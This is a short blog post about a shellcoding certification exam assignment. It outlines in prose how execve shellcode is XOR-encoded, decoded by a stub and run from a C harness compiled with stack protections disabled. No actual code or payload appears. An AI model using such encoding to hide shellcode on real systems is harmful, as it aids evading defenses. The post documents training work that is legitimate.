Friday, October 13, 2017

SLAE64 Exam - Assignment 4 of 7 (Custom Encoder Shellcode)

This post is the fourth of 7 exam assignments of the Pentester Academy's x86/64 Assembly and Shellcoding on Linux.

SLAE64 - 1501

Success in these 7 assignments results in the Pentester Academy's SLAE64 certification.

• Create a custom encoding scheme like the “Insertion Encoder” we showed you
• PoC with using execve-stack as the shellcode to encode with your schema and execute 

All files used in this assignment are below:

I used the execve-stack.nasm that we created in the course and used a xor encoder.  Inspected it for null bytes and confirmed there were none.

I extracted its op code using a modified objdump command.

I pasted the opcode in a xor encoding script.  That script is here.

I executed the script and it outputted xor encoded opcode.

Then I pasted the encoded opcode in a xor decoder nasm script.  That script is here.

After doing a nasm compile and link, I checked for null bytes using the objdump command.

I extracted the opcode using a modified objdump command.

Then, I pasted the opcode in the shellcode.c template.

I compiled shellcode.c using the following command:

$   gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

Then I executed the shellcode binary.  It worked.  Yay.

File used in this assignment:

No comments:

Post a Comment